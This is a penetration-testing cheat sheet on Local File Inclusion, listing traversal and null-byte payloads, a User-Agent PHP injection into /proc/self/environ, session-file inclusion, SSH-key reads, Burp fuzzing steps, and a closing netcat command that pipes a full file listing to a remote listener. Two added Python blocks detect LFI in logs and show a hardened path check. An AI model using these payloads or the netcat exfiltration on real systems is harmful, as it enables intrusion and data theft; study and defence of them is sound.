# Local File Inclusion (LFI)

## Local File Inclusion

* If a parameter value looks like a file or folder path, you might have found an LFI.
* Keep trying combinations until you find one.
* Or Google/searchsploit for a known LFI in the application.
* REF: [PhpTricks](/04-webapps/php-tricks.md), [WebInjections](/04-webapps/03-webapp.md), [PFSenseRemoteExec](/04-webapps/pfsense.md#exec-code-exploit), [CharEvasion](/03-getting-in/char-evasion-tricks.md)

```
LFI Likely:
http://$IP/dept/manage.php?notes=files/nineveh.txt

Testing:
http://$IP/dept/manage.php?notes=files/../../../../etc/passwd
http://$IP/dept/manage.php?notes=files/../../../../../../../etc/passwd
http://$IP/dept/manage.php?notes=/myNotes/../../../etc/passwd
```

## Automation

* Automate LFI enumeration/discovery.
* Good to add to the tool-belt when you want to see which sensitive files exist and are readable once you've found an LFI vulnerability. It also includes a mode (ICE-Breaker) to scan a potential target using an encoded path-traversal list, which helps in LFI discovery.
* <https://www.reddit.com/r/oscp/comments/9fxhbp/helpful_local_file_inclusion_tool_fi/>

```
nikto ..might give you one (if known)
python fi-cyberscan.py -t http://$IP/cyber.php?page= -m1
fimap -u $IP  ..in kali
```

## Whoami, Home, SSH

```
whoami:
/proc/self/status  ..Uid/Gid lines (e.g. 100:101); match them against /etc/passwd

Home directory:
/etc/passwd                    ..learn home path
/var/lib/asterisk/             ..check home path
/var/lib/asterisk/.ssh/id_rsa  ..priv ssh key here?
```

## Code execution via /proc/self/environ

* If you can include /proc/self/environ, you might have code execution, since request headers such as User-Agent are reflected into it
* Burp > Repeater > include /proc/self/environ

```
graph.php?lang=../../../proc/self/environ%00&module=Accounts
User-Agent: <?php echo "hello"; ?>
Go  ..send it
```

## Fuzzing LFI

* Burp > Intercept > Send to **Intruder** > Positions
* Clear & Add: $attack$
* <https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI>
* REF: [Fuzzing](/02-scanning/fuzzing.md)

```
graph.php?lang=../../../etc/passwd%00&module=Accounts
graph.php?lang=../../../$attack$%00&module=Accounts
                           |
                         Keyword for fuzz

Payloads > Load > burp-fuzz > 
LFI-LogFileCheck.txt
LFI-InterestingFiles.txt

Start Attack
Sort by Length ..to see results
```
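Seen from the defender's side, the traversal, null-byte and encoded payloads that Intruder sends stand out in access logs once each request is decoded the same way the server decodes it. Added example, not from the page or any tool it links: a Python detector run over constructed Apache-style log lines whose shapes mirror the requests on this page; the IPs, timestamps and sizes are made up.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed Apache-style access-log lines (no real target); lines 2-4 mirror the shapes
# on this page: raw traversal, /proc/self/environ with %00, a double-encoded session file.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /dept/manage.php?notes=files/nineveh.txt HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /dept/manage.php?notes=files/../../../../etc/passwd HTTP/1.1" 200 1842
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /graph.php?lang=..%2F..%2F..%2Fproc%2Fself%2Fenviron%00&module=Accounts HTTP/1.1" 200 900
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /graph.php?lang=%252e%252e%252ftmp%252fsess_xyz123&module=Accounts HTTP/1.1" 200 40
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /images/photo.jpg HTTP/1.1" 200 3000
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')   # a '..' path segment, either separator
SENSITIVE = ("/etc/passwd", "/proc/self/environ", "/proc/self/status", "/sess_", "/.ssh/", "boot.ini")

def fully_decode(value, max_rounds=3):
    """Percent-decode until stable, so double-encoded %252e%252e still becomes '..'."""
    for _ in range(max_rounds):
        value, prev = unquote(value), value
        if value == prev:
            break
    return value

def lfi_indicators(target):
    """Sorted reason tags for one request target; an empty list means nothing suspicious."""
    parts = urlsplit(target)
    # The server decodes path and query once; anything still encoded after that is suspicious.
    values = [unquote(parts.path)] + [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    reasons = set()
    for once in values:
        full = fully_decode(once)
        if full != once:
            reasons.add("double-encoded")
        if "\x00" in full:
            reasons.add("null-byte")
        if TRAVERSAL_RE.search(full):
            reasons.add("traversal")
        if any(s in full.lower() for s in SENSITIVE):
            reasons.add("sensitive-path")
    return sorted(reasons)

def scan_log(text):
    """One finding per parsed request that carries LFI indicators; status is kept because
    a 200 on a traversal to /etc/passwd is a far stronger signal than a 404."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (reasons := lfi_indicators(m["target"])):
            findings.append({"ip": m["ip"], "status": int(m["status"]), "target": m["target"], "reasons": reasons})
    return findings
```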

## Code execution from LFI (PHP session files)

* If you can locate the PHP session file for your cookie
* You may be able to include it via the LFI in **Burp Repeater** to get execution

```
cd vtiger/  ..if you have the source
grep -R phpinfo\(\)  
maybe: Image/Canvas/PDF.php  ..if we can access?
Find where session is saved:
ex: /tmp/sess_xyz123

Repeater:
graph.php?lang=../../../tmp/sess_xyz123%00&module=Accounts
Might give you execution
```

## Directory Traversals

```
--------------------
--------------------
/images/./photo.jpg             .. ok
/images/../photo.jpg            .. error
/images/../images/photo.jpg     .. win!

http://abc.so/images/../photo.png                              ..ok
http://abc.so/images/../../../../../photo.png                  ..ok
http://abc.so/../../../../../../../../../../secret.key         ..nothing

http://abc.so/file.php?file=photo.png
http://abc.so/file.php?file=./photo.png                  .. added ./
http://abc.so/file.php?file=./file.php                   .. 'real' file.php
http://abc.so/file.php?file=./../../../../../etc/passwd  .. worked !!
http://abc.so/file.php?file=./../../../../../boot.ini    .. windows target !!


--------------------
--------------------
Filtered: can't leave /var/www/

http://abc.so/
http://abc.so/file.php?file=/var/www/photo.png                           ..ok
http://abc.so/file.php?file=/secret.key                                  ..fail
http://abc.so/file.php?file=./../../../../../../../../photo.png          ..fail
http://abc.so/file.php?file=/var/www/file.php                            ..ok
http://abc.so/file.php?file=/var/www/../../../../../../../../etc/passwd  ..ok
```

## NULL BYTE

* %00 ..URL-encoded null byte
* Adding a null byte truncates the path, so a suffix the server appends is dropped (on older systems)
* Works well in Perl and older versions of PHP (fixed in PHP 5.3.4)
* Scenario: the server automatically appends .png to your page parameter

```
http://abc.so/file.php?file=photo                 .. ok
http://abc.so/file.php?file=photo.png             .. nothing
http://abc.so/file.php?file=photo.png%00          .. ok
http://abc.so/file.php?file=file.php%00           .. ok
http://abc.so/file.php?file=/../../etc/passwd%00  .. win
```
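The filtered traversal table and the null-byte section both describe the same weak control: a prefix check on the raw string, which `..` after the prefix walks out of and which `%00` truncation slips past. Added example, not from the page: a Python comparison of that naive check with a canonicalise-then-contain check, run over the page's own table inputs; WEB_ROOT is an assumed document root.

```python
import posixpath

WEB_ROOT = "/var/www"   # assumed document root, matching the page's filtered example

def naive_filter(user_path):
    """Prefix-only check, the kind implied by 'Filtered: can't leave /var/www/'.
    It never normalises, so '/var/www/../../etc/passwd' starts with the prefix and passes."""
    return user_path.startswith(WEB_ROOT + "/")

def hardened_resolve(user_path, suffix=""):
    """Return the resolved path inside WEB_ROOT, or None if the request must be refused.
    `suffix` models a server that appends an extension (the page's '.png' scenario)."""
    if "\x00" in user_path:           # a NUL would truncate path and suffix in C-backed runtimes
        return None
    # Join first, then normalise; posixpath.join keeps an absolute user_path as-is, so the
    # absolute forms from the table are handled too. normpath is purely lexical: on a real
    # host also resolve symlinks with os.path.realpath() before this containment check.
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, user_path + suffix))
    if candidate == WEB_ROOT or candidate.startswith(WEB_ROOT + "/"):
        return candidate
    return None

# The requests from the 'Filtered' table above, in the same order.
PAGE_CASES = [
    "/var/www/photo.png",
    "/secret.key",
    "./../../../../../../../../photo.png",
    "/var/www/file.php",
    "/var/www/../../../../../../../../etc/passwd",
]

def compare(cases=PAGE_CASES):
    """{input: (naive verdict, hardened result)}; the last case is where the two disagree."""
    return {c: (naive_filter(c), hardened_resolve(c)) for c in cases}
```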

## Netcat Tricks

* List all files on the host and send the listing to a remote listener
* REF: [ReverseShell](/03-getting-in/03-reverseshell-php.md#nc), [CharEvasion](/03-getting-in/char-evasion-tricks.md), [LFI](/04-webapps/lfi.md)

```
target: 
echo+abc+|nc+10.x.x.x:9000    ..test
find+/+|nc+10.x.x.x:9000      ..pull all files

kali:
nc -nvlp 9000 > findall.txt   ..receive
```


